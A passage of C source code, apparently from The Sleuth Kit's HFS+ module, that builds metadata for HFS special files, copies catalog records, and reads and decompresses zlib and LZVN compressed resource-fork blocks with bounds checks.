//hfs_load_extended_attrs(fs_file);
    // The Extents file does not have overflow extents recorded in itself
fs_file->meta->attr_state = TSK_FS_META_ATTR_STUDIED;
return 0;
}
/**
* \internal
* Create an FS_INODE structure for the blockmap / allocation file.
*
* @param hfs File system to analyze
* @param fs_file Structure to copy file information into.
* @return 1 on error and 0 on success
*/
static uint8_t
hfs_make_blockmap(HFS_INFO * hfs, TSK_FS_FILE * fs_file)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) hfs;
TSK_FS_ATTR *fs_attr;
TSK_FS_ATTR_RUN *attr_run;
unsigned char dummy1, dummy2;
uint64_t dummy3;
uint8_t result;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_make_blockmap: Making virtual blockmap file\n");
if (hfs_make_specialbase(fs_file)) {
error_returned(" - hfs_make_blockmap");
return 1;
}
fs_file->meta->addr = HFS_ALLOCATION_FILE_ID;
strncpy(fs_file->meta->name2->name, HFS_ALLOCATIONNAME,
TSK_FS_META_NAME_LIST_NSIZE);
fs_file->meta->size =
tsk_getu64(fs->endian, hfs->fs->alloc_file.logic_sz);
if (((attr_run =
hfs_extents_to_attr(fs, hfs->fs->alloc_file.extents,
0)) == NULL) && (tsk_error_get_errno() != 0)) {
error_returned(" - hfs_make_blockmap");
return 1;
}
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned(" - hfs_make_blockmap");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// initialize the data run
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run, NULL,
TSK_FS_ATTR_TYPE_DEFAULT, HFS_FS_ATTR_ID_DATA,
tsk_getu64(fs->endian, hfs->fs->alloc_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->alloc_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->alloc_file.logic_sz), 0, 0)) {
error_returned(" - hfs_make_blockmap");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// see if catalog file has additional runs
if (hfs_ext_find_extent_record_attr(hfs, HFS_ALLOCATION_FILE_ID,
fs_attr, TRUE)) {
error_returned(" - hfs_make_blockmap");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
result = hfs_load_extended_attrs(fs_file, &dummy1, &dummy2, &dummy3);
if (result != 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: Extended attributes failed to load for the Allocation file.\n");
tsk_error_reset();
}
fs_file->meta->attr_state = TSK_FS_META_ATTR_STUDIED;
return 0;
}
/**
* \internal
* Create an FS_INODE structure for the startup / boot file.
*
* @param hfs File system to analyze
* @param fs_file Structure to copy file information into.
* @return 1 on error and 0 on success
*/
static uint8_t
hfs_make_startfile(HFS_INFO * hfs, TSK_FS_FILE * fs_file)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) hfs;
TSK_FS_ATTR *fs_attr;
TSK_FS_ATTR_RUN *attr_run;
unsigned char dummy1, dummy2;
uint64_t dummy3;
uint8_t result;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_make_startfile: Making virtual startup file\n");
if (hfs_make_specialbase(fs_file)) {
error_returned(" - hfs_make_startfile");
return 1;
}
fs_file->meta->addr = HFS_STARTUP_FILE_ID;
strncpy(fs_file->meta->name2->name, HFS_STARTUPNAME,
TSK_FS_META_NAME_LIST_NSIZE);
fs_file->meta->size =
tsk_getu64(fs->endian, hfs->fs->start_file.logic_sz);
if (((attr_run =
hfs_extents_to_attr(fs, hfs->fs->start_file.extents,
0)) == NULL) && (tsk_error_get_errno() != 0)) {
error_returned(" - hfs_make_startfile");
return 1;
}
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned(" - hfs_make_startfile");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// initialize the data run
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run, NULL,
TSK_FS_ATTR_TYPE_DEFAULT, HFS_FS_ATTR_ID_DATA,
tsk_getu64(fs->endian, hfs->fs->start_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->start_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->start_file.logic_sz), 0, 0)) {
error_returned(" - hfs_make_startfile");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// see if catalog file has additional runs
if (hfs_ext_find_extent_record_attr(hfs, HFS_STARTUP_FILE_ID, fs_attr,
TRUE)) {
error_returned(" - hfs_make_startfile");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
result = hfs_load_extended_attrs(fs_file, &dummy1, &dummy2, &dummy3);
if (result != 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: Extended attributes failed to load for the Start file.\n");
tsk_error_reset();
}
fs_file->meta->attr_state = TSK_FS_META_ATTR_STUDIED;
return 0;
}
/**
* \internal
* Create an FS_INODE structure for the attributes file.
*
* @param hfs File system to analyze
* @param fs_file Structure to copy file information into.
* @return 1 on error and 0 on success
*/
static uint8_t
hfs_make_attrfile(HFS_INFO * hfs, TSK_FS_FILE * fs_file)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) hfs;
TSK_FS_ATTR *fs_attr;
TSK_FS_ATTR_RUN *attr_run;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_make_attrfile: Making virtual attributes file\n");
if (hfs_make_specialbase(fs_file)) {
error_returned(" - hfs_make_attrfile");
return 1;
}
fs_file->meta->addr = HFS_ATTRIBUTES_FILE_ID;
strncpy(fs_file->meta->name2->name, HFS_ATTRIBUTESNAME,
TSK_FS_META_NAME_LIST_NSIZE);
fs_file->meta->size =
tsk_getu64(fs->endian, hfs->fs->attr_file.logic_sz);
if (((attr_run =
hfs_extents_to_attr(fs, hfs->fs->attr_file.extents,
0)) == NULL) && (tsk_error_get_errno() != 0)) {
error_returned(" - hfs_make_attrfile");
return 1;
}
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned(" - hfs_make_attrfile");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// initialize the data run
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run, NULL,
TSK_FS_ATTR_TYPE_DEFAULT, HFS_FS_ATTR_ID_DATA,
tsk_getu64(fs->endian, hfs->fs->attr_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->attr_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->attr_file.logic_sz), 0, 0)) {
error_returned(" - hfs_make_attrfile");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// see if catalog file has additional runs
if (hfs_ext_find_extent_record_attr(hfs, HFS_ATTRIBUTES_FILE_ID,
fs_attr, TRUE)) {
error_returned(" - hfs_make_attrfile");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
//hfs_load_extended_attrs(fs_file);
fs_file->meta->attr_state = TSK_FS_META_ATTR_STUDIED;
return 0;
}
/**
* \internal
* Create an FS_FILE structure for the BadBlocks file.
*
* @param hfs File system to analyze
* @param fs_file Structure to copy file information into.
* @return 1 on error and 0 on success
*/
static uint8_t
hfs_make_badblockfile(HFS_INFO * hfs, TSK_FS_FILE * fs_file)
{
TSK_FS_ATTR *fs_attr;
unsigned char dummy1, dummy2;
uint64_t dummy3;
uint8_t result;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_make_badblockfile: Making virtual badblock file\n");
if (hfs_make_specialbase(fs_file)) {
error_returned(" - hfs_make_badblockfile");
return 1;
}
fs_file->meta->addr = HFS_BAD_BLOCK_FILE_ID;
strncpy(fs_file->meta->name2->name, HFS_BAD_BLOCK_FILE_NAME,
TSK_FS_META_NAME_LIST_NSIZE);
fs_file->meta->size = 0;
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned(" - hfs_make_badblockfile");
return 1;
}
// add the run to the file.
if (tsk_fs_attr_set_run(fs_file, fs_attr, NULL, NULL,
TSK_FS_ATTR_TYPE_DEFAULT, HFS_FS_ATTR_ID_DATA,
fs_file->meta->size, fs_file->meta->size, fs_file->meta->size,
0, 0)) {
error_returned(" - hfs_make_badblockfile");
return 1;
}
// see if file has additional runs
if (hfs_ext_find_extent_record_attr(hfs, HFS_BAD_BLOCK_FILE_ID,
fs_attr, TRUE)) {
error_returned(" - hfs_make_badblockfile");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
/* @@@ We have a chicken and egg problem here... The current design of
     * fs_attr_set() requires the size to be set, but we don't know the size
     * until we look into the extents file (which adds to an attribute...).
     * This does not seem to be the best design... need a way to test this. */
fs_file->meta->size = fs_attr->nrd.initsize;
fs_attr->size = fs_file->meta->size;
fs_attr->nrd.allocsize = fs_file->meta->size;
result = hfs_load_extended_attrs(fs_file, &dummy1, &dummy2, &dummy3);
if (result != 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: Extended attributes failed to load for the BadBlocks file.\n");
tsk_error_reset();
}
fs_file->meta->attr_state = TSK_FS_META_ATTR_STUDIED;
return 0;
}
/** \internal
* Copy the catalog file or folder record entry into a TSK data structure.
* @param a_hfs File system being analyzed
* @param a_hfs_entry Catalog record entry (HFS_ENTRY *)
* @param a_fs_file Structure to copy data into (TSK_FS_FILE *)
* Returns 1 on error.
*/
static uint8_t
hfs_dinode_copy(HFS_INFO * a_hfs, const HFS_ENTRY * a_hfs_entry,
TSK_FS_FILE * a_fs_file)
{
// Note, a_hfs_entry->cat is really of type hfs_file. But, hfs_file_folder is a union
    // of that type with hfs_folder. Both hfs_file and hfs_folder have the same first member.
// So, this cast is appropriate.
const hfs_file_folder *a_entry =
(hfs_file_folder *) & (a_hfs_entry->cat);
const hfs_file_fold_std *std;
TSK_FS_META *a_fs_meta = a_fs_file->meta;
TSK_FS_INFO *fs;
uint16_t hfsmode;
TSK_INUM_T iStd; // the inum (or CNID) that occurs in the standard file metadata
if (a_entry == NULL) {
error_detected(TSK_ERR_FS_ARG,
"hfs_dinode_copy: a_entry = a_hfs_entry->cat is NULL");
return 1;
}
fs = (TSK_FS_INFO *) & a_hfs->fs_info;
// Just a sanity check. The inum (or cnid) occurs in two places in the
// entry data structure.
iStd = tsk_getu32(fs->endian, a_entry->file.std.cnid);
if (iStd != a_hfs_entry->inum) {
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: hfs_dinode_copy: HFS_ENTRY with conflicting values for inum (or cnid).\n");
}
if (a_fs_meta == NULL) {
tsk_error_set_errno(TSK_ERR_FS_ARG);
tsk_error_set_errstr("hfs_dinode_copy: a_fs_meta is NULL");
return 1;
}
// both files and folders start off the same
std = &(a_entry->file.std);
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_dinode_copy: called for file/folder %" PRIu32 "\n",
tsk_getu32(fs->endian, std->cnid));
if (a_fs_meta->content_len < HFS_FILE_CONTENT_LEN) {
if ((a_fs_meta =
tsk_fs_meta_realloc(a_fs_meta,
HFS_FILE_CONTENT_LEN)) == NULL) {
return 1;
}
}
a_fs_meta->attr_state = TSK_FS_META_ATTR_EMPTY;
if (a_fs_meta->attr) {
tsk_fs_attrlist_markunused(a_fs_meta->attr);
}
/*
* Copy the file type specific stuff first
*/
hfsmode = tsk_getu16(fs->endian, std->perm.mode);
if (tsk_getu16(fs->endian, std->rec_type) == HFS_FOLDER_RECORD) {
        // set the type if the mode is not set
if ((hfsmode & HFS_IN_IFMT) == 0)
a_fs_meta->type = TSK_FS_META_TYPE_DIR;
a_fs_meta->size = 0;
memset(a_fs_meta->content_ptr, 0, HFS_FILE_CONTENT_LEN);
}
else if (tsk_getu16(fs->endian, std->rec_type) == HFS_FILE_RECORD) {
hfs_fork *fork;
        // set the type if the mode is not set
if ((hfsmode & HFS_IN_IFMT) == 0)
a_fs_meta->type = TSK_FS_META_TYPE_REG;
a_fs_meta->size =
tsk_getu64(fs->endian, a_entry->file.data.logic_sz);
// copy the data and resource forks
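        // (content_ptr holds two hfs_fork structures back to back:
        // index 0 is the data fork, index 1 is the resource fork)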
fork = (hfs_fork *) a_fs_meta->content_ptr;
memcpy(fork, &(a_entry->file.data), sizeof(hfs_fork));
memcpy(&fork[1], &(a_entry->file.resource), sizeof(hfs_fork));
}
else {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_dinode_copy error: catalog entry is neither file nor folder\n");
return 1;
}
/*
* Copy the standard stuff.
* Use default values (as defined in spec) if mode is not defined.
*/
if ((hfsmode & HFS_IN_IFMT) == 0) {
a_fs_meta->mode = 0;
a_fs_meta->uid = 99;
a_fs_meta->gid = 99;
}
else {
a_fs_meta->mode = hfs_mode_to_tsk_mode(hfsmode);
a_fs_meta->type = hfs_mode_to_tsk_meta_type(hfsmode);
a_fs_meta->uid = tsk_getu32(fs->endian, std->perm.owner);
a_fs_meta->gid = tsk_getu32(fs->endian, std->perm.group);
}
// this field is set only for "indirect" entries
if (tsk_getu32(fs->endian, std->perm.special.nlink))
a_fs_meta->nlink = tsk_getu32(fs->endian, std->perm.special.nlink);
else
a_fs_meta->nlink = 1;
a_fs_meta->mtime =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, std->cmtime));
a_fs_meta->atime =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, std->atime));
a_fs_meta->crtime =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, std->crtime));
a_fs_meta->ctime =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, std->amtime));
a_fs_meta->time2.hfs.bkup_time =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, std->bkup_date));
a_fs_meta->mtime_nano = a_fs_meta->atime_nano = a_fs_meta->ctime_nano =
a_fs_meta->crtime_nano = 0;
a_fs_meta->time2.hfs.bkup_time_nano = 0;
a_fs_meta->addr = tsk_getu32(fs->endian, std->cnid);
// All entries here are used.
a_fs_meta->flags = TSK_FS_META_FLAG_ALLOC | TSK_FS_META_FLAG_USED;
if (std->perm.o_flags & HFS_PERM_OFLAG_COMPRESSED)
a_fs_meta->flags |= TSK_FS_META_FLAG_COMP;
// We copy this inum (or cnid) here, because this file *might* have been a hard link. In
// that case, we want to make sure that a_fs_file points consistently to the target of the
// link.
if (a_fs_file->name != NULL) {
a_fs_file->name->meta_addr = a_fs_meta->addr;
}
/* TODO @@@ could fill in name2 with this entry's name and parent inode
from Catalog entry */
/* set the link string (if the file is a link)
* The size check is a sanity check so that we don't try to allocate
* a huge amount of memory for a bad inode value
*/
if ((a_fs_meta->type == TSK_FS_META_TYPE_LNK) &&
(a_fs_meta->size >= 0) && (a_fs_meta->size < HFS_MAXPATHLEN)) {
ssize_t bytes_read;
a_fs_meta->link = tsk_malloc((size_t) a_fs_meta->size + 1);
if (a_fs_meta->link == NULL)
return 1;
bytes_read = tsk_fs_file_read(a_fs_file, (TSK_OFF_T) 0,
a_fs_meta->link, (size_t) a_fs_meta->size,
TSK_FS_FILE_READ_FLAG_NONE);
a_fs_meta->link[a_fs_meta->size] = '\0';
if (bytes_read != a_fs_meta->size) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_dinode_copy: failed to read contents of symbolic link; "
"expected %u bytes but tsk_fs_file_read() returned %u\n",
a_fs_meta->size, bytes_read);
free(a_fs_meta->link);
a_fs_meta->link = NULL;
return 1;
}
}
return 0;
}
/** \internal
* Load a catalog file entry and save it in the TSK_FS_FILE structure.
*
* @param fs File system to read from.
* @param a_fs_file Structure to read into.
* @param inum File address to load
* @returns 1 on error
*/
static uint8_t
hfs_inode_lookup(TSK_FS_INFO * fs, TSK_FS_FILE * a_fs_file,
TSK_INUM_T inum)
{
HFS_INFO *hfs = (HFS_INFO *) fs;
HFS_ENTRY entry;
if (a_fs_file == NULL) {
tsk_error_set_errno(TSK_ERR_FS_ARG);
tsk_error_set_errstr("hfs_inode_lookup: fs_file is NULL");
return 1;
}
if (a_fs_file->meta == NULL) {
a_fs_file->meta = tsk_fs_meta_alloc(HFS_FILE_CONTENT_LEN);
}
if (a_fs_file->meta == NULL) {
return 1;
}
else {
tsk_fs_meta_reset(a_fs_file->meta);
}
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_inode_lookup: looking up %" PRIuINUM "\n",
inum);
// @@@ Will need to add orphan stuff here too
/* First see if this is a special entry
* the special ones have their metadata stored in the volume header */
if (inum == HFS_EXTENTS_FILE_ID) {
if (!hfs->has_extents_file) {
error_detected(TSK_ERR_FS_INODE_NUM,
"Extents File not present");
return 1;
}
return hfs_make_extents(hfs, a_fs_file);
}
else if (inum == HFS_CATALOG_FILE_ID) {
return hfs_make_catalog(hfs, a_fs_file);
}
else if (inum == HFS_BAD_BLOCK_FILE_ID) {
// Note: the Extents file and the BadBlocks file are really the same.
if (!hfs->has_extents_file) {
error_detected(TSK_ERR_FS_INODE_NUM,
"BadBlocks File not present");
return 1;
}
return hfs_make_badblockfile(hfs, a_fs_file);
}
else if (inum == HFS_ALLOCATION_FILE_ID) {
return hfs_make_blockmap(hfs, a_fs_file);
}
else if (inum == HFS_STARTUP_FILE_ID) {
if (!hfs->has_startup_file) {
error_detected(TSK_ERR_FS_INODE_NUM,
"Startup File not present");
return 1;
}
return hfs_make_startfile(hfs, a_fs_file);
}
else if (inum == HFS_ATTRIBUTES_FILE_ID) {
if (!hfs->has_attributes_file) {
error_detected(TSK_ERR_FS_INODE_NUM,
"Attributes File not present");
return 1;
}
return hfs_make_attrfile(hfs, a_fs_file);
}
/* Lookup inode and store it in the HFS structure */
if (hfs_cat_file_lookup(hfs, inum, &entry, TRUE)) {
return 1;
}
/* Copy the structure in hfs to generic fs_inode */
if (hfs_dinode_copy(hfs, &entry, a_fs_file)) {
return 1;
}
/* If this is potentially a compressed file, its
* actual size is unknown until we examine the
* extended attributes */
if ((a_fs_file->meta->size == 0) &&
(a_fs_file->meta->type == TSK_FS_META_TYPE_REG) &&
(a_fs_file->meta->attr_state != TSK_FS_META_ATTR_ERROR) &&
((a_fs_file->meta->attr_state != TSK_FS_META_ATTR_STUDIED) ||
(a_fs_file->meta->attr == NULL))) {
hfs_load_attrs(a_fs_file);
}
return 0;
}
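/* Describes one block of compressed data inside a resource fork: a byte
 * offset and the compressed length of the block. */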
typedef struct {
uint32_t offset;
uint32_t length;
} CMP_OFFSET_ENTRY;
static int
hfs_read_zlib_block_table(const TSK_FS_ATTR *rAttr, CMP_OFFSET_ENTRY** offsetTableOut, uint32_t* tableSizeOut, uint32_t* tableOffsetOut) {
int attrReadResult;
hfs_resource_fork_header rfHeader;
uint32_t dataOffset;
uint32_t offsetTableOffset;
    char fourBytes[4];          // Number of entries in the offset table, little endian
    uint32_t tableSize;         // Number of entries in the offset table
char *offsetTableData = NULL;
CMP_OFFSET_ENTRY *offsetTable = NULL;
size_t indx;
// Read the resource fork header
attrReadResult = tsk_fs_attr_read(rAttr, 0, (char *) &rfHeader,
sizeof(hfs_resource_fork_header), TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult != sizeof(hfs_resource_fork_header)) {
error_returned
(" %s: trying to read the resource fork header", __func__);
return 0;
}
// Begin to parse the resource fork. For now, we just need the data offset.
dataOffset = tsk_getu32(TSK_BIG_ENDIAN, rfHeader.dataOffset);
// The resource's data begins with an offset table, which defines blocks
// of (optionally) zlib-compressed data (so that the OS can do file seeks
// efficiently; each uncompressed block is 64KB).
offsetTableOffset = dataOffset + 4;
// read 4 bytes, the number of table entries, little endian
attrReadResult =
tsk_fs_attr_read(rAttr, offsetTableOffset, fourBytes, 4,
TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult != 4) {
error_returned
(" %s: trying to read the offset table size, "
"return value of %u should have been 4", __func__, attrReadResult);
return 0;
}
tableSize = tsk_getu32(TSK_LIT_ENDIAN, fourBytes);
// Sanity-check the entry count so that the allocations and reads below
// cannot overflow and the table cannot be empty (it is indexed later).
if (tableSize == 0 || tableSize > UINT32_MAX / 8) {
error_detected(TSK_ERR_FS_READ,
" %s: invalid offset table size %" PRIu32, __func__, tableSize);
return 0;
}
// Each table entry is 8 bytes long
offsetTableData = tsk_malloc(tableSize * 8);
if (offsetTableData == NULL) {
error_returned
(" %s: space for the offset table raw data", __func__);
return 0;
}
offsetTable =
(CMP_OFFSET_ENTRY *) tsk_malloc(tableSize *
sizeof(CMP_OFFSET_ENTRY));
if (offsetTable == NULL) {
error_returned
(" %s: space for the offset table", __func__);
goto on_error;
}
attrReadResult = tsk_fs_attr_read(rAttr, offsetTableOffset + 4,
offsetTableData, tableSize * 8, TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult != tableSize * 8) {
error_returned
(" %s: reading in the compression offset table, "
"return value %u should have been %u", __func__, attrReadResult,
tableSize * 8);
goto on_error;
}
for (indx = 0; indx < tableSize; ++indx) {
offsetTable[indx].offset =
tsk_getu32(TSK_LIT_ENDIAN, offsetTableData + indx * 8);
offsetTable[indx].length =
tsk_getu32(TSK_LIT_ENDIAN, offsetTableData + indx * 8 + 4);
}
free(offsetTableData);
*offsetTableOut = offsetTable;
*tableSizeOut = tableSize;
*tableOffsetOut = offsetTableOffset;
return 1;
on_error:
free(offsetTable);
free(offsetTableData);
return 0;
}
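/** \internal
 * Reads the compression-unit table of an LZVN decmpfs resource fork.
 * The fork begins with a sequence of 4-byte little-endian offsets; the first
 * offset both locates the first compressed block and gives the size of the
 * offset table in bytes (4 times the number of offsets, which is one more
 * than the number of blocks). Block lengths are the differences between
 * consecutive offsets, the last offset marking the end of the data.
 *
 * @param rAttr resource fork attribute to read from
 * @param offsetTableOut [out] allocated table of block descriptors (caller must free)
 * @param tableSizeOut [out] number of entries in the table
 * @param tableOffsetOut [out] always 0; block offsets are absolute within the fork
 * @returns 1 on success, 0 on error
 */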
static int
hfs_read_lzvn_block_table(const TSK_FS_ATTR *rAttr, CMP_OFFSET_ENTRY** offsetTableOut, uint32_t* tableSizeOut, uint32_t* tableOffsetOut) {
int attrReadResult;
char fourBytes[4];
uint32_t tableDataSize;
uint32_t tableSize; // Size of the offset table
char *offsetTableData = NULL;
CMP_OFFSET_ENTRY *offsetTable = NULL;
// The offset table is a sequence of 4-byte offsets of compressed
// blocks. The first 4 bytes is thus the offset of the first block,
// but also 4 times the number of entries in the table.
attrReadResult = tsk_fs_attr_read(rAttr, 0, fourBytes, 4,
TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult != 4) {
error_returned
(" %s: trying to read the offset table size, "
"return value of %u should have been 4", __func__, attrReadResult);
return 0;
}
tableDataSize = tsk_getu32(TSK_LIT_ENDIAN, fourBytes);
// The raw table must hold at least two 4-byte entries: the offset of the
// first block and the end-of-data offset.
if (tableDataSize < 8) {
error_detected(TSK_ERR_FS_READ,
" %s: invalid offset table data size %" PRIu32, __func__, tableDataSize);
return 0;
}
offsetTableData = tsk_malloc(tableDataSize);
if (offsetTableData == NULL) {
error_returned
(" %s: space for the offset table raw data", __func__);
return 0;
}
// table entries are 4 bytes, last entry is end of data
tableSize = tableDataSize / 4 - 1;
offsetTable =
(CMP_OFFSET_ENTRY *) tsk_malloc(tableSize *
sizeof(CMP_OFFSET_ENTRY));
if (offsetTable == NULL) {
error_returned
(" %s: space for the offset table", __func__);
goto on_error;
}
attrReadResult = tsk_fs_attr_read(rAttr, 0,
offsetTableData, tableDataSize, TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult != tableDataSize) {
error_returned
(" %s: reading in the compression offset table, "
"return value %u should have been %u", __func__, attrReadResult,
tableDataSize);
goto on_error;
}
uint32_t a = tableDataSize;
uint32_t b;
size_t i;
for (i = 0; i < tableSize; ++i) {
b = tsk_getu32(TSK_LIT_ENDIAN, offsetTableData + 4*(i+1));
offsetTable[i].offset = a;
offsetTable[i].length = b - a;
a = b;
}
free(offsetTableData);
*offsetTableOut = offsetTable;
*tableSizeOut = tableSize;
*tableOffsetOut = 0;
return 1;
on_error:
free(offsetTable);
free(offsetTableData);
return 0;
}
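/** \internal
 * Copies a compression unit that is stored uncompressed (the leading flag
 * byte indicates no compression) into the output buffer, dropping that
 * flag byte.
 *
 * @returns 1 on success, 0 on error
 */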
static int hfs_decompress_noncompressed_block(char* rawBuf, uint32_t len, char* uncBuf, uint64_t* uncLen) {
// actually an uncompressed block of data; just copy
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Copying an uncompressed compression unit\n", __func__);
if ((len - 1) > COMPRESSION_UNIT_SIZE) {
error_detected(TSK_ERR_FS_READ,
"%s: uncompressed block length %u is longer "
"than compression unit size %u", __func__, len - 1,
COMPRESSION_UNIT_SIZE);
return 0;
}
memcpy(uncBuf, rawBuf + 1, len - 1);
*uncLen = len - 1;
return 1;
}
#ifdef HAVE_LIBZ
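/** \internal
 * Decompresses a single zlib compression unit, or copies it unchanged when
 * the low 4 bits of its leading byte are 0x0F (the block is stored raw).
 *
 * @returns 1 on success, 0 on error
 */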
static int hfs_decompress_zlib_block(char* rawBuf, uint32_t len, char* uncBuf, uint64_t* uncLen)
{
// see if this block is compressed
if (len > 0 && (rawBuf[0] & 0x0F) != 0x0F) {
// Uncompress the chunk of data
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Inflating the compression unit\n", __func__);
unsigned long bytesConsumed;
int infResult = zlib_inflate(rawBuf, (uint64_t) len,
uncBuf, (uint64_t) COMPRESSION_UNIT_SIZE,
uncLen, &bytesConsumed);
if (infResult != 0) {
error_returned
(" %s: zlib inflation (uncompression) failed with error %d",
__func__, infResult);
return 0;
}
if (bytesConsumed != len) {
error_detected(TSK_ERR_FS_READ,
" %s, decompressor did not consume the whole compressed data",
__func__);
return 0;
}
return 1;
}
else {
// actually an uncompressed block of data; just copy
return hfs_decompress_noncompressed_block(rawBuf, len, uncBuf, uncLen);
}
}
#endif
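/** \internal
 * Decompresses a single LZVN compression unit, or copies it unchanged when
 * its leading byte is 0x06 (the block is stored raw).
 *
 * @returns 1 on success, 0 on error
 */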
static int hfs_decompress_lzvn_block(char* rawBuf, uint32_t len, char* uncBuf, uint64_t* uncLen)
{
// see if this block is compressed
if (len > 0 && rawBuf[0] != 0x06) {
*uncLen = lzvn_decode_buffer(uncBuf, COMPRESSION_UNIT_SIZE, rawBuf, len);
return 1; // apparently this can't fail
}
else {
// actually an uncompressed block of data; just copy
return hfs_decompress_noncompressed_block(rawBuf, len, uncBuf, uncLen);
}
}
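/** \internal
 * Reads one compression unit from the resource fork and decompresses it
 * using the supplied decompress_block callback.
 *
 * @param rAttr resource fork attribute
 * @param rawBuf buffer for the raw block; at least COMPRESSION_UNIT_SIZE + 1 bytes
 * @param uncBuf buffer for the uncompressed data; at least COMPRESSION_UNIT_SIZE bytes
 * @param offsetTable table of block descriptors
 * @param offsetTableSize number of entries in offsetTable
 * @param offsetTableOffset offset that the table entries are relative to
 * @param indx index of the compression unit to read
 * @param decompress_block callback that decompresses one block
 * @returns number of uncompressed bytes on success, 0 for a zero-length
 *          block, or -1 on error
 */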
static ssize_t read_and_decompress_block(
const TSK_FS_ATTR* rAttr,
char* rawBuf,
char* uncBuf,
const CMP_OFFSET_ENTRY* offsetTable,
uint32_t offsetTableSize,
uint32_t offsetTableOffset,
size_t indx,
int (*decompress_block)(char* rawBuf,
uint32_t len,
char* uncBuf,
uint64_t* uncLen)
)
{
int attrReadResult;
uint32_t offset = offsetTableOffset + offsetTable[indx].offset;
uint32_t len = offsetTable[indx].length;
uint64_t uncLen;
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Reading compression unit %d, length %d\n",
__func__, indx, len);
/* Github #383 reported that if len is 0, then the below code causes
* problems. Added this check, but I don't have data to verify this on.
* It looks like it should at least not crash, but it isn't clear whether
* it will also do the right thing, or whether it should actually break
* here instead. */
if (len == 0) {
return 0;
}
if (len > COMPRESSION_UNIT_SIZE + 1) {
error_detected(TSK_ERR_FS_READ,
"%s: block size is too large: %u", __func__, len);
return -1;
}
// Read in the block of compressed data
attrReadResult = tsk_fs_attr_read(rAttr, offset,
rawBuf, len, TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult != len) {
char msg[] =
"%s%s: reading in the compressed data block, "
"return value %u should have been %u";
if (attrReadResult < 0 ) {
error_returned(msg, " ", __func__, attrReadResult, len);
}
else {
error_detected(TSK_ERR_FS_READ, msg, "", __func__, attrReadResult, len);
}
return -1;
}
if (!decompress_block(rawBuf, len, uncBuf, &uncLen)) {
return -1;
}
// If size is a multiple of COMPRESSION_UNIT_SIZE,
// expected uncompressed length is COMPRESSION_UNIT_SIZE
const uint32_t expUncLen = indx == offsetTableSize - 1 ?
((rAttr->fs_file->meta->size - 1) % COMPRESSION_UNIT_SIZE) + 1 :
COMPRESSION_UNIT_SIZE;
if (uncLen != expUncLen) {
error_detected(TSK_ERR_FS_READ,
"%s: compressed block decompressed to %" PRIu64 " bytes, "
"should have been %" PRIu32 " bytes", __func__, uncLen, expUncLen);
return -1;
}
// There are now uncLen bytes of uncompressed data available from
// this comp unit.
return (ssize_t)uncLen;
}
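/** \internal
 * Generic attribute walk for a file whose data is compressed in the resource
 * fork. Reads the block table with read_block_table, decompresses each unit
 * with decompress_block, and passes the uncompressed data to a_action in
 * lumps of at most one file system block.
 *
 * @returns 0 on success, 1 on error
 */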
static uint8_t
hfs_attr_walk_compressed_rsrc(const TSK_FS_ATTR * fs_attr,
int flags, TSK_FS_FILE_WALK_CB a_action, void *ptr,
int (*read_block_table)(const TSK_FS_ATTR *rAttr,
CMP_OFFSET_ENTRY** offsetTableOut,
uint32_t* tableSizeOut,
uint32_t* tableOffsetOut),
int (*decompress_block)(char* rawBuf,
uint32_t len,
char* uncBuf,
uint64_t* uncLen))
{
TSK_FS_INFO *fs;
TSK_FS_FILE *fs_file;
const TSK_FS_ATTR *rAttr; // resource fork attribute
